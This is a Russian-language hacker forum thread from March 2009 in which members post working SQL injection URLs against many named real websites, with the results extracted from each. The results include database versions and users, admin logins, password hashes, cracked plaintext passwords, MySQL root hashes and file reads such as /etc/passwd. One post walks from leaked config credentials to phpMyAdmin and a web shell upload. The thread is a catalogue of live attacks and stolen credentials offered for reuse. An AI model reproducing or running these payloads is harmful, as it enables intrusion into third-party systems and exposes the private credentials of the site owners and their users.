http://www.maestroauto.com.ua/goods.php?id=-1+union+select+1,2,3,4,concat_w s(0x3a,version (),database(),user()),6,7,8,9,10--
Database Version : 4.1.22-standard
Database name : doktor_automarket
User name : doktor_uzver@localhost
---------------------------------------------------+
http://www.contractshina.ru/about/index.php?pid=-1+union+select+concat_ ws(0x3a,version(),databas e(),user()),2,3,4--
Database Version : 5.0.45
Database name : contractshinaru
User name : contractshinaru@localhost
юзвери:
http://www.contractshina.ru/about/index.php?pid=-1+union+select+concat_ws(0x3a,regname ,password),2,3,4+fro m+users--
админка без авторизации :
http://contractshina.ru/admin
http://www.yurmino.com/index.php?page=lech&id=-4+union+select+concat(user(),0x3a,version(),0x3a,d atabase())--
u_yurmino@localhost:4.1.22:yurmino
PR=4
http://www.4x4parts.ru/come-up.shtml?id=-4+union+select+1,2,3,4,concat(version(),0x3a,datab ase(),0x3a,user()),6,7,8--
5.0.45-log:4x4parts:4x4parts@localhost
PR=3
http://www.ralf-art.ru/news.php?id=-4+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6,7--
ralfart@localhost:4.1.22:ralfart
PR=4
-m0rgan-
04.03.2009, 22:13
Ну вот как обычно небольшой сбор :)
Налетай :)
http://www.apslaquila.it/event.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2--
версия/юзер/бд:
5.0.22:apslaquila@localhost:apslaquila
-----------------------------------------------------------------------
http://www.motortribe.it/news_view.php?ID=-1+union+all+select+0,1,2,concat_ws(0x3a,version(), user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
версия/юзер/бд:
5.0.22:mt_user@lnx6653:I-DEAS_motortribe
--------------------------------------------------------------------
http://www.alessandrastocchino.it/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database())--
версия/юзер/бд:
log:Sql85634@62.149.141.41:Sql85634_1
------------------------------------------------------------------
http://www.gurtenapotheke.ch/product.php?id=-1+union+all+select+concat_ws(0x3a,version(),user() ,database()),1--
версия/юзер/бд:
4.1.25:gurtenap@localhost:gurtenap_data
-------------------------------------------------------------------
http://www.codexflores.ch/event.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(), user(),database()),4,5,6,7--
версия/юзер/бд:
5.0.45:root@localhost:codexflores
----------------------------------------------------------------------
http://www.marchanzeiger.ch/newsdetail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er(),database()),3,4,5--
версия/юзер/бд:
4.0.24_Debian-10sarge1:marchanzeiger@localhost:marchanzeiger 3
---------------------------------------------------------------------
http://www.klassiker-garage.ch/show.php?ID=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3,4,5,6,7,8--
версия/юзер/бд:
4.1.22-standard:web373@localhost:usr_web373_1
-------------------------------------------------------------------
http://www.spitalzollikerberg.ch/download.php?id=-1+union+all+select+0,1,2,3,4,concat_ws(0x3a,versio n(),user(),database())--
версия/юзер/бд:
5.0.32-Debian_7etch8:root@localhost:cms24
---------------------------------------------------------------------
http://www.palatina.ch/gallery.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3--
версия/юзер/бд:
4.1.18-standard:dabumpimpa_pa@localhost:dabumpimpa_palati na
------------------------------------------------------------------
http://www.theofficepub.at/event.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er(),database()),3,4,5--
версия/юзер/бд:
5.0.77-1-log:jist@localhost:jistTheOfficePub
---------------------------------------------------------------------
The End!
http://www.mebor.eu/main.php?ids=-148+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,concat_ws(0x3a,version(),database(),user()) ,35,36/*&t=0&lang=11
Database Version: 4.1.22-standard
Database name: meboreu_new
User name: meboreu_new@localhost
http://www.bjshijirongtian.com.cn/fen.php?id=-133+union+select+1,2,version(),4,5,6,7/*
5.0.41-community-nt
http://www.caraudiocenter.ru/catalog_f.php?m=coral&id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user()),5,6,7,8,9,10--
Database Version : 5.0.32-Debian_7etch6-log
Database name : z34747_aam
User name : z34747_aam@77.221.130.25
юзвери:
http://www.caraudiocenter.ru/catalog_f.php?m=coral&id=-1+union+select+1,2,3,concat_ ws(0x3a,email,password ),5,6,7,8,9,10+from+sa_users+limit+1,1--
вход по мылу
ПаВлУшКа
04.03.2009, 23:12
Наткнулся на интересную скулю, вот:
http://www.crysys.hu/showabstract.php?id=-118+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,version(),version (),28,29--
Интересна тем, что при запросе
http://www.crysys.hu/showabstract.php?id=-118+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
Она не выводит на экран поля, пришлось их угадывать.....кто знает, что это - напишите плиз в ЛС или icq - 95199999
http://www.sehensw.hirnstetten.de/sw.php?id=-8+union+select+1,version()/*
5.0.45-Debian_1ubuntu3.4-log
http://www.accnn.ru/index.php?id_page=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9--
Database Version : 4.0.27-max-log
Database name : accnn99_acms
User name : accnn99_acms@v29.valuehost.ru
-----------------------------------------------------+
http://rezina.com.ua/news/?news_id=-826+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8, 9,10--&q=0
Database Version : 5.0.45-log
Database name : rezina
User name : rezina@localhost
http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,group_concat(0x3a,user_id,0 x3a,username,0x3a,userpass),3+from+educos.poll_use r--
Louis:3ca70a4c295483a97698770bc683b11d ------>eiken
http://www.pap.ro/detaliu.php?id=-117+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11
Database Version: 4.1.22-standard
Database name: pap_pap
User name: pap_pap@localhost
http://www.booknow.biz/display.php?id=20766+union+select+1,2,3,concat(a_n ame,0x3a,a_passwd),5+from+admins/*
есть users
ичо 1 biz )
Pagerank: 6
тИЦ: 650
http://www.kond.ru/news.php?newsid=-1+union+select+1,2,conca t_ws(0x3a,v ersion(),database(),user()),4--
Database Version : 5.0.27-log
Database name : wwwkondru
User name : akseon@localhost
----------------------------------------------------------------+
Pagerank: 5
тИЦ: 750
http://www.ukrmebel.com/ShopNews.php?NewsId=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,ve rsion( ),database(),user()),0x71),0x71),4,5,6--
Database Version : 5.0.16
Database name : mebel
User name : mebel@localhost
----------------------------------------------------------------+
Pagerank: 5
тИЦ: 600
http://www.matress.ru/prod1.php?pID=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32, 33--&proizv=290&vID=70
Database Version : 5.0.67-log
Database name : u12715
User name : u12715@10.9.11.32
http://www.networkpower.exide.com/products/range_select.asp?range=S300&sub_id=-7+or+1=@@version--&cl=np_apps&lng=en
Version : Microsoft SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2
http://www.networkpower.exide.com/products/range_select.asp?range=S300&sub_id=-7+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+ALL+T OP+x+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--&cl=np_apps&lng=en
x=1....127
S0ulVortex
05.03.2009, 10:23
www.ebenformayor.com
http://www.ebenformayor.com/news.php?ax=v&n=23&id=6&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
version: 5.0.45-log
user: ebenform_user@cgi0605.int.bizland.net
database: ebenform_cms
Assembler
05.03.2009, 13:33
http://www.mona-liza.com
PR: 3
Тиц: 50
Версия: 4.0.27-log
База данных: mona-liza
Юзверь: mona-liza@zvm17.host.ru
http://www.mona-liza.com/act.php?id=-1%20union%20select%201,2,3,4,5--
Сай монны лизы =))
AkyHa_MaTaTa
05.03.2009, 14:06
www.esd.lv PR-5
http://www.esd.lv/inner.php?left=490&left2=491+union+select+1,2,3,4,5,concat_ws(0x3A,us er(),user,password,host,file_priv),7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21+from+mysql.user--+
root@localhost:root:*95C79488BBFA161B765760B9654AA A544D1ABB1C:localhost:Y
сервак судя по путям на wamp - C:\wamp\www\index.php
http://www.esd.lv/inner.php?left=490&left2=491+union+select+1,2,3,4,5,LOAD_FILE(0x433a5 c77616d705c7777775c61646d696e5c696e6465782e706870) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
http://www.esd.lv/inner.php?left=490&left2=491+union+select+1,2,3,4,5,concat_ws(0x3A,lo gin,parole),7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21+from+esd.lietotaji+where+admin=1--+
admin:gruutaa_1981
http://www.esd.lv/admin/
elt.pearsoned.it Pr-5
http://elt.pearsoned.it/schedaopera/scheda_opera.php?ID=-1+union+select+1,unhex(hex(concat_ws(0x3a,user(),@ @version,database()))),3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34--+
user:root@localhost
version: 4.1.15-standard
db:catalogo
http://elt.pearsoned.it/schedaopera/scheda_opera.php?ID=-1+union+select+1,unhex(hex(LOAD_FILE(0x2f686f6d653 22f7765622f656c742f5f617574682e706870))),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34--+
root:augusto
http://www.honda-bikes.ro/interior.php?cat=4&id=-103+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26
Database Version: 4.1.22-standard-log
Database name: hondab_honda
User name: hondab_fix@localhost
http://www.honda-bikes.ro/interior.php?cat=4&id=-103+UNION+SELECT+1,2,3,4,5,6,CONCAT_WS(0x3a,user_e mail,user_id,user_password,username),8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+php bb_users+LIMIT+1,1
andu@zeppelindesign.com:2:f6fdffe48c908deb0f4c3bd3 6c032e72:admin
f6fdffe48c908deb0f4c3bd36c032e72=adminadmin
http://www.dddb.net/php/latestnews_Linked.php?id=-526+union+select+AES_DECRYPT(AES_ENCRYPT(version() ,1),1),2,3,4/*
4.1.14-Debian_5-log
http://search.msn.com/results.aspx?q=IP%3A208.113.142.65&FORM=MSNH
неплохо..
раскрытие путей:
/home/.dalai/dddb/dddb.net/php
http://www.lancia.ro/noutati.php?id=-35+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versi on(),database(),user()),9
Database Version: 5.0.67-community
Database name: lancia2_content2
User name: lancia2_admcon@localhost
AkyHa_MaTaTa
05.03.2009, 18:52
www.allbiz.com.my Pr-4 - какой то шоп или что типо того
http://www.allbiz.com.my/details3.php?ID=35&cid=223123123+union+select+1,2,3,concat_ws(0x3A,us er(),version(),database()),5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35+--+&type=P
user:allbiz_mago@localhost
version:5.0.45-community
database:allbiz_portal
http://www.allbiz.com.my/details3.php?ID=35&cid=223123123+union+select+1,2,3,concat_ws(0x3A,us er_name,password,level_access,status),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35+from+allbiz_portal.admin _table+limit+0,1--+&type=P
danny:37b7db0c3712a78e46046d78fff8b72a:d9:3:1 - danny:d9dojo1234
hang:ab50db46cef89a0a40d7efb4b39e75d0:33:3:1 - hang:3311111111
сюда пассы не подходят http://www.allbiz.com.my/admin/signmein.php, кому надо можети порыться
http://vantulschimbarii.ro/petitie.php?act=w&id=4+AND+ASCII(SUBSTRING((select+version()),1,1))= x
x=53,46,48,46,54,55,45,99,111,109,109,117,110,105, 116,121,45,108,111,103
http://vantulschimbarii.ro/petitie.php?act=w&id=4+AND+ASCII(SUBSTRING((select+database()),1,1)) =x
x=118,97,110,116,117,108,115,99,95,109,97,103,111, 114
http://vantulschimbarii.ro/petitie.php?act=w&id=4+AND+ASCII(SUBSTRING((select+user()),1,1))=x
x=118,97,110,116,117,108,115,99,95,109,97,103,111, 114,64,108,111,99,97,108,104,111,115,116
Version : 5.0.67-community-log
Database : vantulsc_magor
User : vantulsc_magor@localhost
Pagerank: 4
тИЦ: 500
http://www.fotik.com/one_news.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),us er()),8,9,10,11,12--
Database Version : 5.0.51a-community
Database name : db_fotik1
User name : fotik1@localhost
юзвери :
http://fotik.com/one_news.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_nam e,user_ pass),8,9,10,11,12+from+users+limit+0,1--
adm :
http://fotik.com/one_news.php?id=-1+union+select+1,2,3,4,5,6,conca t_ws(0x3a,name,pass),8,9,10,11,12+from+use r_site+limit+0,1--
Viktor:radio
S0ulVortex
05.03.2009, 23:03
www.unitedoneproductions.org
http://www.unitedoneproductions.org/news.php?ax=v&n=11&id=7&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5--
version: 4.1.22-standard
user: unitedon_user@localhost
database: unitedon_data
dr.Pilulkin
05.03.2009, 23:08
http://www.standardsuk.com/shop/products_view.php?prod=-37590+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,c ount(concat_ws(0x3a,email,password)),database(),ve rsion(),17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34+from+users--
-m0rgan-
06.03.2009, 00:15
Налетай!
http://www.mbleague.at/game.php?ID=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(0x3a,ve rsion(),user(),database()),8,9,10,11,12--
4.1.21-max-log:d006343d@localhost:d006343d
-----------------
http://www.transportforum.at/read.php?id=-1+union+all+select+0,1,convert(concat_ws(0x3a,vers ion(),user(),database())+using+latin1),3,4,5--
4.1.10a:transport790ma@localhost:transportforum_at _-_news
----------------------------
http://www.styx-partners.com/at/view.php?id=-1+union+all+select+0,1,2,3,4,5,6,concat_ws(0x3a,ve rsion(),user(),database()),8,9,10--
5.0.45:styx-partners@localhost:styx-partners
--------------------------------
http://www.cameogolf.com/se/category.php?Id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3--
4.0.16-standard:apache@localhost:cameogol_1
-------------------------
http://www.wrcb.se/newsid.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er(),database()),3--
5.0.32-Debian_7etch8-log:wrcb_se@srv15.one.com:wrcb_se
----------------------
http://www.idrottshuset.se/readnews.php?ID=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3,4,5,6,7,8--
5.0.33-log:ih@localhost:ih
-------------------------------------------
http://www.kanalsyd.se/event.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(), user(),database()),4,5,6,7,8,9,10--
5.0.45-log:kanalsy_se@k7887@s83.loopia.se:kanalsyd_se
---------------------
http://www.universalmusic.se/labels.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,version(), user(),database()),4--
4.1.22-standard-log:umusic@localhost:universalmusic
--------------
http://www.roxyrecordings.se/news.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3,4,5,6--
4.1.18:rox
------------------------------------
The End!
christmasgifts.com
http://www.christmasgifts.com/sub-cat.php?ID=-90+union+select+1,version(),3,4,5
4.1.20
http://www.fad.ro/detalii.php?id=9128+UNION+SELECT+concat_ws(0x3a,ve rsion(),database(),user()),2,3,null,5,6,null,8--
Database Version: 5.0.67-community
Database name: fad_futurearfad
User name: fad_fad@localhost
Pagerank: 5
тИЦ: 375
http://www.byttehnika.ru/?action=print_news_body&id_news=1+union+select+concat_ ws(0x3a,version(),database(),user()),2,3,4--
Database Version : 5.0.38-Ubuntu_0ubuntu1.4-log
Database name : 003ru
User name : 003ru@localhost
adm:
http://www.byttehnika.ru/?action=print_news_body&id_news=1+union+select+concat_ws(0x3a,User ,password),2,3,4 +from+user+limit+1,1--
003ru_select:095fa070006515cf
Cennarios
06.03.2009, 05:13
http://www.ricosrl.ro
Крутится на 4м мускуле. Хитрый администратор сдул подчистую эту партию.
Дыра:
http://www.ricosrl.ro/lucrari/lucrare.php?lucrare=-1+union+select+concat_ws(0x3a3a,User,password,user ()),2,3+from+mysql.user/*
Таблицы не подбрутились, но чудо-юзер имеет FILE_PRIV = YES. Порывшись в скриптах, находим конфиг и в нем:
define('_HOST','localhost');
define('_USER','root');
define('_PASS','rico1991');
define('_DATABASE','photon_rico');
Детально изучив файлы отвечающие за аутентификацию - видим, что логин жестко забит в скрипте, а именно:
login: user
Пароль же берется от регов указанных в конфиге к БД:
pass: rico1991
http://www.ricosrl.ro/administrare/ <- сама админка
Но админка беспонтовая и шелл через нее не залить, поэтому смотрим дальше.
http://www.ricosrl.ro/admin/ <- лежит пхпмайадмин
Берем реги из конфига и коннектимся.
Как залить шелл далее понятно =)
бедный сайт( мне его жалко(( Что с ним будет...
travel.chinavista.com pr 5
http://travel.chinavista.com/show_culture.php?id=-7%20union%20select%201,concat_ws(0x23,database(),u ser(),version()),3,4,5,6,7
entravel#dedop@localhost#5.0.45
adminka
http://travel.chinavista.com/admin/ basic
memberka
http://travel.chinavista.com/guide-login.php
www.colinst.com pr 5
http://www.colinst.com/brief.php?id=-6%20union%20select%201,2,3,4,5,concat_ws(0x23,data base(),user(),version())
colinsttest#root@localhost#5.0.67
http://www.colinst.com/admin/
root#*9F65C210660F2E3F11A0BCDA6F368888B00A97C7
http://www.antichitati.ro/oferta_produse.php?ID=-4'+union+select+1,2,3,4,concat_Ws(0x3a,version(),d atabase(),user()),6,7/*
Database Version: 4.1.20-log
Database name: antichitati
User name: antichitati@localhost
S0ulVortex
06.03.2009, 13:17
www.ukrtexzbut.com.ua
http://www.ukrtexzbut.com.ua/index.php?page=200%27&id=-30+UNION+SELECT+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12--%20&tovar=7_16
version: 5.0.67-community-log
user: ukrtexzb_scalibu@localhost
database: ukrtexzb_poshyk
Pagerank: 4
тИЦ: 300
http://www.giacint.ru/inside.php?action=price&pid=4265&id=4274+union+select+1,2,3,concat_ws(0x3a,version( ),databas e(),user( )),5,6,7,8,9,10,11,12,13,14--
Database Version : 5.0.75
Database name : giacintf_f
User name : giacintf_f@localhost
юзвери выводятся без лимита, но админа я там не нашел :mad: :
http://www.giacint.ru/inside.php?action=price&pid=4265&id=4274+union+select+1,2,3,concat_ws(0x3a,nik,pwd, email),5,6,7,8,9,10,11,12,13,14+from+gia _otzivusers--
админка, вдруг пригодится:
http://www.giacint.ru/cpanel/
ПаВлУшКа
06.03.2009, 15:20
http://www.chapalain.li/sNews/index.php?id=-31+union+select+1,version(),3,4,5,6,7,8,9,10,11--
http://www.944.li/gaestebuch/kommentar.php?id=-85+union+select+1,2,3,4,version(),user(),7,8,9,10, 11,12,13,14,15--
Вроде 5-я версия MySQL, а вот таблицы выводить не хочет((
-m0rgan-
06.03.2009, 16:00
http://www.hdip.com.pk/index.php?id=-1+union+all+select+0,1,concat_ws(0x3a,id,login,pas sword),3,4+from+admin--
ид/логин/пасс:
1:admin:admin
http://www.hdip.com.pk/index.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er()%20,database()),3,4--
юзер/версия/бд:
5.0.51a-community-log:hdipdb@72.51.46.233:hdip
-------------------------------------------------------------------
The End!
AkyHa_MaTaTa
06.03.2009, 17:57
www.akusherstvo.ru Pr-5 ТиЦ 2700
http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=212321+union+select+concat_ws(0x3A,use r(),version(),database()),2--+
user:jakAkush@localhost
version:5.0.32-Debian_7etch8
database:jakza_akush
http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=212321+union+select+concat_ws(0x3A,adm in_login,admin_pass),2+from+jakza_akush.admin--+
jak : pak
www.shogunclub.ru ТиЦ-300 SQL injection+php include
http://www.shogunclub.ru/kendo.php?ArticleID=-312317+union+select+1,2,3,4,5,6,0x687474703a2f2f73 686172612d64612e6d6f792e73752f696e636c7564652e696e 63,8,9,10--+
BlackSun
06.03.2009, 18:03
http://f-online.ru/newsr.php?id=-1+union+select+1,2,concat_ws(0x3a,USER(),DATABASE( ),VERSION()),4+--+
fairytal_results@localhost:fairytal_results:5.0.51 a-community
http://www.monavissa.ro/pagini.php?pag_id=-4'+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5/*
Database Version: 4.1.22-log
Database name: monavissa_new
User name: monavissa@localhost
-m0rgan-
06.03.2009, 19:31
http://www.cpaug.org/publications.php?Id=-1+union+all+select+0,concat_ws(0x3a,username,passw ord),2,3,4,5+from+users--
Логин/пасс:
Sema:nakiseki
http://www.cpaug.org/publications.php?Id=-1+union+all+select+0,concat_ws(0x3a,version(),user (),database()),2,3,4,5+from+users--
версия/юзер/бд:
4.0.21:cpaug.org@195.249.40.97:cpaug_org
------------------------------------------------------------------------------
The End!
http://www.ewclid.ru/news/?id=-164+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5--&returnto=0&n=1
Database Version : 4.0.27
Database name : ewclid2
User name : comcom@hosting.rusoft.ru
сбрутил только логин:
http://www.ewclid.ru/news/?id=-164+union+select+1,log in,3,4,5+from+users--&returnto=0&n=1
www.themusichutch.com (pr 4)
http://www.themusichutch.com/listen.php?songid=41348+union+select+0,1,2,3,versi on(),5,6,7,8,9,10,11,12,13,14,table_name+from+INFO RMATION_SCHEMA.TABLES%20LIMIT+1,1--
tables:
md_emails
mh_invites
mh_logins
http://www.sbx-re.ro/anunturi-imobiliare-sbx-1590+AND+ASCII(SUBSTRING((select+version() ),1,1))=x/*.html
x=52,46,49,46,50,50,45,115,116,97,110,100,97,114,1 00
http://www.sbx-re.ro/anunturi-imobiliare-sbx-1590+AND+ASCII(SUBSTRING((select+database() ),1,1))=x/*.html
x=114,111,109,97,110,105,97,105,95,100,98
http://www.sbx-re.ro/anunturi-imobiliare-sbx-1590+AND+ASCII(SUBSTRING((select+user() ),1,1))=x/*.html
x=114,111,109,97,110,105,97,105,95,111,118,105,100 ,105,117,64,108,111,99,97,108,104,111,115,116
Version : 4.1.22-standard
Database : romaniai_db
User : romaniai_ovidiu@localhost
http://www.romaniaimobiliare.ro/anunturi-imobiliare-proprietari-5779+AND+ASCII(SUBSTRING((select+user() ),11,1))=x/*.html?pag_language=ro
выдает те же самые данные что и первый сайт...
http://www.tonicompany.ro/index.php?command=categproduse&sid=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6&pag=3
Database Version: 5.0.67-community-log
Database name: tonicomp_tonitrading
User name: tonicomp_vlad@localhost
http://www.turisminromania.ro/index.php?judet=10+UNION+SELECT+1,concat_ws(0x3a,v ersion(),database(),user()),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49+limit+1,1--
Database Version: 5.0.51a-log
Database name: turisminromania_ro_turisminromania
User name: 1329web@192.168.88.2
Respekt R1dex !
spherics
07.03.2009, 09:09
PR- 6
http://www.businessghana.com/portal/directory/index.php?op=getSubDirectories&category=IT&id=4+union+select+concat_ws(0x3a,version(),user(), database()),2,3,4--
Database Version: 5.0.67-community
Database name: repo_bg
User name: repo_repo@localhost
PR - 6
http://www.gjc.it/2006/en/show_2007.php?id=747897988898+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 ,9,10,11,12--
Version: 4.1.21-standard-log
User: gjc@localhost
Database: gjc2006
http://it.ut.ac.ir/research_projects_en_frame.php?id=8908097654+UNION +SELECT+1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT(AES_EN CRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,U ser(),0x3a),0x71),0x71),13,14,15,16,17,18,19--
Database Version: 4.1.10a
Database name: it
User name: itmodir@localhost
PR - 5
http://www.mvtimes.com/as-you-see-it/image.php?cat=-10+union+select+concat_ws(0x3a,version(),user(),da tabase())--&id=4
Version:5.0.27
User:mvtimes@localhost
Database:mvtdb
PR - 4
http://www.mediamorphosis.it/en/news.php?id=8907987654+union+select+1,concat_ws(0x 3a,version(),user(),database()),3,4,5--
Version:4.0.24_Debian-10sarge3-log
User:media@localhost
Database:morpho
PR - 4
http://thatday.it/eng/press_view.php?id=809809809868764+union+select+1,2 ,3,4,5,6,7,concat_ws(0x3a,version(),user(),databas e()),9,10--
Version:5.0.22-Debian_0ubuntu6.06.10
User:thatday01@localhost
Database:thatday_db1
PageRank = 5
http://www.dm.univaq.it/page.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),user() ,database())--&id_menu=13
Database Version: 5.0.37
Database name: becontent
User name: root@localhost
http://www.dm.univaq.it/page.php?id=-4+union+select+1,2,concat_ws(0x3a,user,password)+f rom+mysql.user--&id_menu=13
root : 43b15bb255f188a4
Читаем etc/passwd
http://www.dm.univaq.it/page.php?id=-4+UNION+SELECT+1,2,CONCAT(0x3a,LOAD_FILE(0x2F65746 32F706173737764),0x3a)--&id_menu=13
Читаем /etc/httpd/conf/httpd.conf
http://www.dm.univaq.it/page.php?id=-4+UNION+SELECT+1,2,CONCAT(0x3a,LOAD_FILE(0x2F65746 32F68747470642F636F6E662F68747470642E636F6E66),0x3 a)-- &id_menu=13
Читаем /var/www/html/index.php
http://www.dm.univaq.it/page.php?id=-4+UNION+SELECT+1,2,CONCAT(0x3a,LOAD_FILE(0x2F76617 22F7777772F68746D6C2F696E6465782E706870),0x3a)-- &id_menu=13
Читаем /var/www/html/include/template.inc.php
http://www.dm.univaq.it/page.php?id=-4+UNION+SELECT+1,2,CONCAT(0x3a,LOAD_FILE(0x2F76617 22F7777772F68746D6C2F696E636C7564652F74656D706C617 4652E696E632E706870),0x3a)-- &id_menu=13
Копаемся дальше в поисках нужной нам информации.Вопрос в том что нам нужно там -)))
Еще один Рут на пятёрочке итальянской....
http://www.economia.unipd.it/didattica/index.php?sezione=DIDATTICA&sub=63¯o=3&id=-4+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4--&prev=1&corso=ECO2120
4.0.5a-beta-log
wwwadm@localhost
Economia
http://www.economia.unipd.it/didattica/index.php?sezione=DIDATTICA&sub=63¯o=3&id=-4+union+select+concat_ws(0x3a,user,password),2,3,4 +from+mysql.user--&prev=1&corso=ECO2120
root : 6ebe97855d5cfacb
hibiny.ru
http://www.hibiny.ru/tourism/cam.php?id=-2%20union%20select%20version()/*
version(): 5.0.45
user(): u56119@localhost
spherics
07.03.2009, 11:21
http://www.pi2s2.it/applications/application_details.php?ID=897987984798798798+unio n+select+1,concat_ws(0x3a,version(),user(),databas e()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36, 37,38,39,40--
Version:5.0.45
User:root@localhost
Database:pi2s2_applications
http://www.pi2s2.it/applications/application_details.php?ID=897987984798798798+unio n+select+1,concat_ws(0x3a,user,password),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+fr om+mysql.user--
root:40dcd73246a08b24
user_appweb:60776d8c1b2603fe
support_cometa:4d88db586081c8e1
support_gilda:59456f66536f08a2
quest_user:3fca398228ffeb0d
cometa:0b0499ae0af29196
triadmin:4db2e1f0371bb23c
user_trigrid:799f669976a96721
user_gridct:071161424fdd32d6
user_tutorial:5a6f10b433888a81
sgadmin:40b75bf20b89fd7f
cdsprova:12bb79285094f6c9
momentaneo:12bb79285094f6c9
cdscometa:2d98430975596ec0
cdsagenda:3285d95736219716
user_egroup:309830266c320655
inveniocometa:2a67070b5a1f24d6
cds_cometa:5c8b8ed8746fe245
cometaagenda:0b0499ae0af29196
user_application:60776d8c1b2603fe
school_cairo:40b743500b89f4dd
quest_infn:3f17c5654c4efe74
joomla_cometa:2526327f78e49d24
grisu_user:05e18b2f6159ffb3
emidio_test:4200820054e0fa20
userinaf:45359d850a65b59c
na4_appl:3a696946195acda9
http://atecdrexim.ro/textile/index.php?command=categproduse&sid=-10+union+select+1,concat_Ws(0x3a,version(),databas e(),user()),3,4,5
Database Version: 5.0.67-community-log
Database name: atecdrex_textile
User name: atecdrex_user@localhost
Pagerank: 5
тИЦ: 800
http://www.tabe.ru/news/index.php?a=-1+union+select+1,concat_ws(0x3a,version (),databa se(),user()),3,4,5,6--&y=2009
Database Version : 4.0.27-log
Database name : tabe
User name : tabe@pm1.zenon.net
-------------------------------------------------+
Pagerank: 3
тИЦ: 750
http://www.zamoroz.ru/news.php?news_id=-1+union+select+1,2,3,4,5,6,concat_ ws(0x3a,version(),d atabase(),user()),8,9--
Database Version : 5.0.67-log
Database name : u9557
User name : u9557@10.10.153.176
вывод юзверей с форума, без лимита:
http://www.zamoroz.ru/news.php?news_id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,usern ame,password),8,9+from+ phorum_users--
"Заморозь.ру":c19f8c2ed4e1db99593c23783528aaa9
заказ цветов
